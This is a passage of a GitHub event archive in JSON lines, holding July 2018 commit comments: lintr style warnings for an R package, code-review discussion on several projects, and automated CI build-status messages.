removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T17:41:55Z"}
{"id":"7984464422","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753564,"position":78,"line":130,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:42:11Z","updated_at":"2018-07-18T17:42:11Z","author_association":"MEMBER","body":"If whitespace is a valid character(s) for an attribute in the database, it still can contribute to the key. Stripping it out *probably* won't cause any problems, but can that be guaranteed?"}},"created_at":"2018-07-18T17:42:11Z"}
{"id":"7984465137","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29753566,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-18T17:42:19Z","updated_at":"2018-07-18T17:42:19Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 85](http://ci.n5o.green/viewLog.html?buildId=1610&buildTypeId=Plugins_Csv) is now running\n"}},"created_at":"2018-07-18T17:42:19Z"}
{"id":"7984467403","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29753571,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-18T17:42:47Z","updated_at":"2018-07-18T17:42:47Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 85](http://ci.n5o.green/viewLog.html?buildId=1610&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:28"}},"created_at":"2018-07-18T17:42:47Z"}
{"id":"7984467782","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29753572,"position":null,"line":null,"path":null,"commit_id":"027a42cabba480cab8743f2aa281731dace9a1ea","created_at":"2018-07-18T17:42:52Z","updated_at":"2018-07-18T17:42:52Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.03%25-green.png)</a>\n"}},"created_at":"2018-07-18T17:42:52Z"}
{"id":"7984468001","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29753574,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-18T17:42:55Z","updated_at":"2018-07-18T17:42:55Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 86](http://ci.n5o.green/viewLog.html?buildId=1611&buildTypeId=Plugins_Csv) is now running\n"}},"created_at":"2018-07-18T17:42:55Z"}
{"id":"7984468921","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753577,"position":101,"line":320,"path":"orthoinference/src/main/java/org/reactome/orthoinference/OrthologousEntity.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:43:07Z","updated_at":"2018-07-18T17:43:07Z","author_association":"MEMBER","body":"This applies to all of the caches in this commit: Does it ever happen that you need to replace something in a cache with an updated version of the same instance?"}},"created_at":"2018-07-18T17:43:07Z"}
{"id":"7984472115","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29753587,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-18T17:43:46Z","updated_at":"2018-07-18T17:43:46Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 86](http://ci.n5o.green/viewLog.html?buildId=1611&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:50"}},"created_at":"2018-07-18T17:43:46Z"}
{"id":"7984478882","type":"CommitCommentEvent","actor":{"login":"vijaynalawade"},"repo":{"name":"TIBCOSoftware/flogo-contrib"},"payload":{"comment":{"id":29753609,"position":5,"line":48,"path":"action/flow/model/simple/iteratorbehavior.go","commit_id":"13dce3389c5fa5244b5157ca8d81f9fc43a8dca8","created_at":"2018-07-18T17:45:06Z","updated_at":"2018-07-18T17:45:06Z","author_association":"COLLABORATOR","body":"Should we just say ''%s' is not a valid integer value to iterate on\"?"}},"created_at":"2018-07-18T17:45:06Z"}
{"id":"7984481569","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29753617,"position":null,"line":null,"path":null,"commit_id":"d7cf818758abd7038de776772cfb8c8e2dfd2fb5","created_at":"2018-07-18T17:45:37Z","updated_at":"2018-07-18T17:45:37Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 87](http://ci.n5o.green/viewLog.html?buildId=1612&buildTypeId=Plugins_Csv) is now running\n"}},"created_at":"2018-07-18T17:45:37Z"}
{"id":"7984482327","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29753619,"position":null,"line":null,"path":null,"commit_id":"d7cf818758abd7038de776772cfb8c8e2dfd2fb5","created_at":"2018-07-18T17:45:46Z","updated_at":"2018-07-18T17:45:46Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 87](http://ci.n5o.green/viewLog.html?buildId=1612&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:08"}},"created_at":"2018-07-18T17:45:46Z"}
{"id":"7984487250","type":"CommitCommentEvent","actor":{"login":"mirh"},"repo":{"name":"imageguy/fglrx-for-Fedora"},"payload":{"comment":{"id":29753628,"position":null,"line":null,"path":null,"commit_id":"57817204b7c18d2766c477035f64f9a25df1e4d0","created_at":"2018-07-18T17:46:42Z","updated_at":"2018-07-18T17:46:42Z","author_association":"NONE","body":"You might want to amend the commit title"}},"created_at":"2018-07-18T17:46:42Z"}
{"id":"7984497217","type":"CommitCommentEvent","actor":{"login":"wiiaboo"},"repo":{"name":"jb-alvarado/media-autobuild_suite"},"payload":{"comment":{"id":29753652,"position":null,"line":null,"path":null,"commit_id":"f0c4ab95b02d21bb2b7abf610c5da33c8a77dc54","created_at":"2018-07-18T17:48:39Z","updated_at":"2018-07-18T17:48:39Z","author_association":"COLLABORATOR","body":"Try with last commit.\r\n\r\n> Also the option seems to be missing in the full build - choice number 4 in the ini-file.\r\n\r\nI don't want to add an untested lib to built-in options. That's the point."}},"created_at":"2018-07-18T17:48:39Z"}
{"id":"7984505811","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29753664,"position":null,"line":null,"path":null,"commit_id":"272018a5164abfed99a532f7490b3bc9a4bdeb5d","created_at":"2018-07-18T17:50:19Z","updated_at":"2018-07-18T17:50:19Z","author_association":"OWNER","body":"Collision 14.30.1~15"}},"created_at":"2018-07-18T17:50:19Z"}
{"id":"7984508513","type":"CommitCommentEvent","actor":{"login":"ptomato"},"repo":{"name":"endlessm/coding-discovery-center"},"payload":{"comment":{"id":29753669,"position":1,"line":1,"path":"data/meson.build","commit_id":"bc07945e128b3aa03167263e8a17af9b5f7e6b22","created_at":"2018-07-18T17:50:50Z","updated_at":"2018-07-18T17:50:50Z","author_association":"MEMBER","body":"There's no license on this repo yet, defaulting it to proprietary, so I'm not sure I can assume that."}},"created_at":"2018-07-18T17:50:50Z"}
{"id":"7984509391","type":"CommitCommentEvent","actor":{"login":"humdingerb"},"repo":{"name":"haiku/website"},"payload":{"comment":{"id":29753670,"position":4,"line":15,"path":"content/blog/kapix/2018-07-08_libreoffice_for_haiku_a_not-so-short_story.md","commit_id":"099ed4abef0530e270eb52613b43e3ead48ef0ba","created_at":"2018-07-18T17:51:00Z","updated_at":"2018-07-18T17:51:00Z","author_association":"COLLABORATOR","body":"oops. sorry about that. pushed the fix..."}},"created_at":"2018-07-18T17:51:00Z"}
{"id":"7984514329","type":"CommitCommentEvent","actor":{"login":"cookersjs"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753682,"position":63,"line":115,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:51:58Z","updated_at":"2018-07-18T17:51:58Z","author_association":"CONTRIBUTOR","body":"Regarding the second question (though this applies to the overall philosophy behind this):\r\nThe cache is only used during runtime for this species, theres (currently) no persistence outside of that. What this new code is supposed to do is reduce the **fetchIdenticalInstances** calls. Caching had been happening for ewas', complexes, entitysets, etc but hadn't been implemented for the identical instance check. This was costing us time since it's an expensive action (particularly so with this API) that happens many times for each instance being inferred. \r\n\r\nSince we only care about making sure that identical instance calls happen only once, I think we need only care about a unit test that ensures that calling getCacheKey _n_ times results in the same order being returned _n_ times. "}},"created_at":"2018-07-18T17:51:58Z"}
{"id":"7984521089","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29753694,"position":121,"line":153,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-18T17:53:17Z","updated_at":"2018-07-18T17:53:17Z","author_association":"NONE","body":"You know how many sensors are involved in your calibration, and how many observations of each one you have. Thats enough to set the size of vv_clouds, and the 2 upper levels of vvv_planes. Then you can avoid doing:\r\nvv_clouds[i].push_back(cloud);"}},"created_at":"2018-07-18T17:53:17Z"}
{"id":"7984523231","type":"CommitCommentEvent","actor":{"login":"khaffner"},"repo":{"name":"nicholasdille/docker"},"payload":{"comment":{"id":29753698,"position":null,"line":null,"path":null,"commit_id":"4267e3f05e83e98d2075811eff1b30b4e3a73bdb","created_at":"2018-07-18T17:53:41Z","updated_at":"2018-07-18T17:53:41Z","author_association":"NONE","body":"psexec in windowsservercore gives me the error\r\n\r\nThe handle is invalid.\r\nError establishing communication with PsExec service on F1C39EDC02B1:\r\nThe command 'cmd /S /C c:\\windows\\temp\\psexec.exe -accepteula -s cmd /c whoami' returned a non-zero code: 6\r\n\r\nDoes psexec work on a windowsservercore container at all? I struggle to find good examples."}},"created_at":"2018-07-18T17:53:41Z"}
{"id":"7984523540","type":"CommitCommentEvent","actor":{"login":"Crumdidlyumshis"},"repo":{"name":"ElvUI-Vanilla/ElvUI"},"payload":{"comment":{"id":29753699,"position":null,"line":null,"path":null,"commit_id":"bec2d179c8b6198dbea4fc0c0065ad4c756be4fe","created_at":"2018-07-18T17:53:44Z","updated_at":"2018-07-18T17:53:44Z","author_association":"CONTRIBUTOR","body":"This in Bags too but I can’t get the cool down to show :("}},"created_at":"2018-07-18T17:53:44Z"}
{"id":"7984523593","type":"CommitCommentEvent","actor":{"login":"shiftrtech"},"repo":{"name":"shiftrtech/mailinblue"},"payload":{"comment":{"id":29753700,"position":null,"line":null,"path":null,"commit_id":"349d4e4a2e65938052efcf743c94b46e1c75774f","created_at":"2018-07-18T17:53:44Z","updated_at":"2018-07-18T17:53:44Z","author_association":"OWNER","body":"Created multidev environment [mailinblue#ci-3](https://dashboard.pantheon.io/sites/7c88439c-0f59-4679-be2f-1f02e1043d37#ci-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-3-mailinblue.pantheonsite.io/)"}},"created_at":"2018-07-18T17:53:44Z"}
{"id":"7984523921","type":"CommitCommentEvent","actor":{"login":"cookersjs"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753701,"position":63,"line":115,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:53:48Z","updated_at":"2018-07-18T17:53:48Z","author_association":"CONTRIBUTOR","body":"The final option you suggested might be useful as well depending on if keys are similar, such as in a theoretical case where all defining attributes return null. The map could be based on defining attribute names and the value"}},"created_at":"2018-07-18T17:53:48Z"}
{"id":"7984528993","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29753712,"position":15,"line":50,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-18T17:54:46Z","updated_at":"2018-07-18T17:54:46Z","author_association":"NONE","body":"But since there is more information than just the plane cloud (like the normals), you can find a better name, maybe: publishPlane3D"}},"created_at":"2018-07-18T17:54:46Z"}
{"id":"7984532527","type":"CommitCommentEvent","actor":{"login":"pierrecdn"},"repo":{"name":"pierrecdn/phpipam"},"payload":{"comment":{"id":29753722,"position":4,"line":61,"path":"Dockerfile","commit_id":"5f352e57d438a456f37c6e6c1bf9eb7304ceaadd","created_at":"2018-07-18T17:55:26Z","updated_at":"2018-07-18T17:55:26Z","author_association":"OWNER","body":"OPT: Could be inlined with the first chown but anyway this also works."}},"created_at":"2018-07-18T17:55:26Z"}
{"id":"7984532570","type":"CommitCommentEvent","actor":{"login":"cookersjs"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753723,"position":78,"line":130,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:55:26Z","updated_at":"2018-07-18T17:55:26Z","author_association":"CONTRIBUTOR","body":"I suppose that is a good point -- I think I irrationally distrust whitespaces for stuff like this"}},"created_at":"2018-07-18T17:55:26Z"}
{"id":"7984535479","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29753730,"position":null,"line":null,"path":null,"commit_id":"a5a130b95af6a6c1ea2e710ba435ea4dc3ee4372","created_at":"2018-07-18T17:56:01Z","updated_at":"2018-07-18T17:56:01Z","author_association":"MEMBER","body":"nice catch"}},"created_at":"2018-07-18T17:56:01Z"}
{"id":"7984537396","type":"CommitCommentEvent","actor":{"login":"cookersjs"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753731,"position":101,"line":320,"path":"orthoinference/src/main/java/org/reactome/orthoinference/OrthologousEntity.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:56:24Z","updated_at":"2018-07-18T17:56:24Z","author_association":"CONTRIBUTOR","body":"Yea this is something you've brought up from the beginning. I don't _think_ so, but I don't know 100%. Thats on my list of things to check"}},"created_at":"2018-07-18T17:56:24Z"}
{"id":"7984537522","type":"CommitCommentEvent","actor":{"login":"bryanhuntesl"},"repo":{"name":"esl/exometer_core"},"payload":{"comment":{"id":29753732,"position":null,"line":null,"path":null,"commit_id":"de97a458653b6d5fa424b843e76832f61ad46672","created_at":"2018-07-18T17:56:26Z","updated_at":"2018-07-18T17:56:26Z","author_association":"NONE","body":"Oh god yes @kzemek - this is the commit of the century - very, very nice. \r\n"}},"created_at":"2018-07-18T17:56:26Z"}
{"id":"7984539074","type":"CommitCommentEvent","actor":{"login":"khayerockx"},"repo":{"name":"khayerockx/Vault-repo"},"payload":{"comment":{"id":29753735,"position":4,"line":22,"path":"Vault/Vault/Form1.cs","commit_id":"854187e54ec6ae7085ec40a568a963fd6fcd9ddd","created_at":"2018-07-18T17:56:44Z","updated_at":"2018-07-18T17:56:44Z","author_association":"OWNER","body":"Why you remove this?\r\n"}},"created_at":"2018-07-18T17:56:44Z"}
{"id":"7984539638","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29753737,"position":26,"line":26,"path":"gui/config/CCalibFromPlanesConfig.h","commit_id":"36e25cc00070660c90d1f6cc49709bbd05165264","created_at":"2018-07-18T17:56:51Z","updated_at":"2018-07-18T17:56:51Z","author_association":"NONE","body":"Then you could try to find more descriptive names:\r\n\"start calibration\" would start the planes segmentation --> Extract planes \r\n\"proceed calibration\" would trigger the matching, and so on --> Calibrate"}},"created_at":"2018-07-18T17:56:51Z"}
{"id":"7984540422","type":"CommitCommentEvent","actor":{"login":"khayerockx"},"repo":{"name":"khayerockx/Vault-repo"},"payload":{"comment":{"id":29753739,"position":2,"line":20,"path":"Vault/Vault/Form1.cs","commit_id":"854187e54ec6ae7085ec40a568a963fd6fcd9ddd","created_at":"2018-07-18T17:57:00Z","updated_at":"2018-07-18T17:57:00Z","author_association":"OWNER","body":"Is it necessary?"}},"created_at":"2018-07-18T17:57:00Z"}
{"id":"7984540616","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29753740,"position":null,"line":null,"path":null,"commit_id":"027a42cabba480cab8743f2aa281731dace9a1ea","created_at":"2018-07-18T17:57:03Z","updated_at":"2018-07-18T17:57:03Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2900 of 2942 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 42 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 581\n * Failed: 42\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.57%25-yellow.png)</a> \n"}},"created_at":"2018-07-18T17:57:03Z"}
